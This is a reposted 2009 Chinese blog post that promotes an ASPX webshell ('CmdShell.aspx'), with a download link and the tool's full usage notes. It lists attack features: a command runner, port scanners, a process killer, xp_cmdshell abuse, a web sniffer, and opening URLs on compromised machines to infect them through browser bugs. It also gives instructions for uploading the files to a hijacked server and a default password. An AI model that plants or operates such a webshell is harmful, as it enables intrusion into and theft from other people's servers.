数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 



老鬼写的aspxshell beta版
樱木花盗 发表于 2009-8-2 1:21:21

转自:Link's blog
http://hi.baidu.com/linkhack/blog/item/ebffe4ceb1761534f9dc611a.html

事先说明 。。这个不是bin的修改版。是老鬼独自开发的 C#开发

欢迎转载 。。

完整下载地址: http://link.idc.03389.com/laogui.rar

我把使用说明.txt发出来让大家尝尝鲜:

孤行一鬼CmdShell.aspx工具使用说明:

    注意:此程序只授权网站管理员、网站及服务器维护人员、安全爱好者等安全检测之用,请勿用于非法用途,否则由此引起的一切后果与工具作者无关,此说明文件与程序同时发布,若有转载,请勿删除此文件!请保持发布的完整性。

工具说明:
    此工具为孤行一鬼闲暇之余随便写的练手之作,由于没有太多的时间和精力去写,再加上老鬼的技术很菜,所以目前此工具功能很弱,主要有以下几个:

一、 磁盘、文件、目录操作及查看 (删除、编辑功能没有开放)

二、 CMD运行器

三、 文件打包下载 (为了防止误操作,在线解压功能被屏蔽,只支持本地解压)

四、 网络配置信息查看(完全是鸡肋,只当写着玩)

五、 端口扫描器一(不是多线程扫描,有时间的话,在下个版本中会出多线程扫描)

六、 端口扫描器二

七、进程管理器(在USER权限下可以杀掉同一服务器的其它站点进程,在ADMIN权限下为所欲为)

八、 网上邻居查看器(可以查看一些网络共享资源,可能有时间会用得上吧,嘿嘿,瞎写)

九、 浏览器操作器(用肉机的浏览器去打开一个网址,写这个的目的是让服务器中通过IE漏洞中标,或是一些其它用途,老鬼写完后一直没有测试,只是留了个位置,说不定哪天能用得上吧,^_^)

十、 扫描可写目录权限 (网上不知道哪位前辈写的,直接照搬过来了,版权归原作者)

十一、 遍历ACL值(TNND,水平忒菜,没有搞定,好像只有ADMINISTRATOR权限的才可以,USER权限下好像遍历不了,只是留了个思路,占了个位置,是个鸡肋)

十二、sa权限dbo.xp_cmdshell利用工具(这个就不多说了。不能在SQL2005下运行,有时间再研究)

十三、WMI重启(有时间我们知道远程管理员的用户名和密码,而无法用WEBSHELL重启远程肉机,所以有了这个东东,不过是个空壳子,老鬼没有时间写就发布出来了,大家别骂哦!)

十四、WEBSNIFFER 这个可是重拳产品,功能强大,杀人越货不可少的东东,不过代码是CNQING写的,我只是集成到我的SHELL中进来了,版权归CNQING所有。另外CNQING的嗅探器代码中,由于停止按钮会将服务器的SESSION置空,所以会让WEBSHELL重新登录,嘿嘿,老鬼发现了,懒得改,大家先凑合着用,老鬼有时间再改。

大概就这些功能,其它功能都是占了个位置,没有写代码,大家别仍砖头!


文件说明:

使用说明.txt               你正在看的这个文件,不用上传到肉机
PrecompiledApp.config      预编译配置文件,使用前上传到肉机根目录下。
bin目录                    使用前请将这个目录及该目录下的两个文件
   App_Web_cmdshell.aspx.cdcab7d2.dll
   cmdshell.aspx.cdcab7d2.compiled
上传至肉机网站目录的根目录下,要是肉机网站根目录下已存在BIN目录的话,哪么就把
   App_Web_cmdshell.aspx.cdcab7d2.dll
   cmdshell.aspx.cdcab7d2.compiled
这两个文件传到肉机BIN目录就即可。
unzip.exe                  这个东东不用上传到肉机上去。用网马把远程文件在线打包下来后,用这个东东解开。解到最后的时候弹出一个提示,不用理它就行了,懒得去调试代码。此工具在。NET环境上运行,测试环境为。NET 2.0。


使用方法:


文件全部上传完成以后,我们可以用以下的地址来访问,比如我们测试的地址是:

www.abc.com,哪么我们可以用这个地址http://www.abc.com/cmdshell.aspx来访问,不要担心页面不存在,默认密码是老鬼的QQ号 147399120

最后老鬼的QQ号:147399120 欢迎大家加我,多多批评,多多指教。

喜欢C#开发的朋友们加群 30369215
喜欢网络安全的朋友们请加群 1961659

加之前请注明验证消息“CMDSHELL”,否则会被视为广告者给拒绝。


阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.